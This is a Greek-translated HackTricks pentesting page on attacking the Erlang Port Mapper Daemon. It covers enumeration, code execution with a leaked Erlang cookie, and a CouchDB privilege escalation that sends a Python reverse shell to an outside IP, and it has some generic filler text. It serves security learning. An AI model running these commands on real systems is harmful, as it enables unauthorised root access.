hacktricks/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md

<details>

<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.

</details>


# Βασικές Πληροφορίες

Το **Erlang Port Mapper Daemon (epmd)** λειτουργεί ως συντονιστής για κατανεμημένα παραδείγματα της Erlang. Είναι υπεύθυνο για την αντιστοίχιση συμβολικών ονομάτων κόμβων σε διευθύνσεις μηχανών, εξασφαλίζοντας ουσιαστικά ότι κάθε όνομα κόμβου συσχετίζεται με μια συγκεκριμένη διεύθυνση. Αυτός ο ρόλος του **epmd** είναι κρίσιμος για την άριστη αλληλεπίδραση και επικοινωνία μεταξύ διαφορετικών κόμβων Erlang σε ένα δίκτυο.

**Προεπιλεγμένη θύρα**: 4369
```
PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
```
Αυτό χρησιμοποιείται από προεπιλογή σε εγκαταστάσεις RabbitMQ και CouchDB.

# Απαρίθμηση

## Χειροκίνητη
```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369

#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
```
## Αυτόματο

Η αυτόματη λειτουργία είναι μια δυνατότητα που επιτρέπει σε ένα σύστημα ή μια εφαρμογή να λειτουργεί αυτόνομα, χωρίς την ανάμειξη ανθρώπινης παρέμβασης. Αυτό σημαίνει ότι η διαδικασία ή η ενέργεια που πραγματοποιείται εκτελείται αυτόματα, χωρίς την ανάγκη για χειροκίνητη επέμβαση.

Στο πλαίσιο του χάκινγκ, η αυτόματη λειτουργία μπορεί να αναφέρεται σε εργαλεία ή τεχνικές που εκτελούν αυτόματα επιθέσεις ή εκμεταλλεύονται ευπάθειες σε συστήματα, χωρίς την ανάγκη για χειροκίνητη παρέμβαση από τον χάκερ. Αυτό επιτρέπει στον χάκερ να εκτελεί γρήγορα και αποτελεσματικά επιθέσεις, εκμεταλλευόμενος τις αδυναμίες του συστήματος.

Η αυτόματη λειτουργία μπορεί να χρησιμοποιηθεί επίσης για την αυτόματη ανίχνευση ευπαθειών σε συστήματα, την αυτόματη σάρωση δικτύου ή την αυτόματη εκτέλεση εργασιών σε ένα σύστημα. Αυτό επιτρέπει στον χάκερ να εντοπίζει ευπάθειες και να εκτελεί επιθέσεις μεγάλης κλίμακας, χωρίς την ανάγκη για χειροκίνητη παρέμβαση.
```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|     kazoo_apps: 11500
|_    kazoo-rabbitmq: 25672
```
# Erlang Cookie RCE

## Απομακρυσμένη Σύνδεση

Εάν μπορείτε να **διαρρεύσετε το Authentication cookie**, θα μπορείτε να εκτελέσετε κώδικα στον κεντρικό υπολογιστή. Συνήθως, αυτό το cookie βρίσκεται στο `~/.erlang.cookie` και δημιουργείται από το erlang κατά την πρώτη εκκίνηση. Εάν δεν τροποποιηθεί ή δεν οριστεί χειροκίνητα, είναι μια τυχαία συμβολοσειρά \[A:Z] με μήκος 20 χαρακτήρων.
```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]

Eshell V8.1 (abort with ^G)

At last, we can start an erlang shell on the remote system.

(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
Περισσότερες πληροφορίες στο [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
Ο συγγραφέας μοιράζεται επίσης ένα πρόγραμμα για την αποτροπή του cookie:

{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}

## Τοπική Σύνδεση

Σε αυτήν την περίπτωση θα καταχραστούμε το CouchDB για να αναβαθμίσουμε τα προνόμια τοπικά:
```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```
Παράδειγμα που προέρχεται από [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
Μπορείτε να χρησιμοποιήσετε τη μηχανή **Canape HTB** για να **εξασκηθείτε** στο πώς να **εκμεταλλευτείτε αυτήν την ευπάθεια**.

## Metasploit
```bash
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
```
# Shodan

* `port:4369 "στη θύρα"`


<details>

<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.

</details>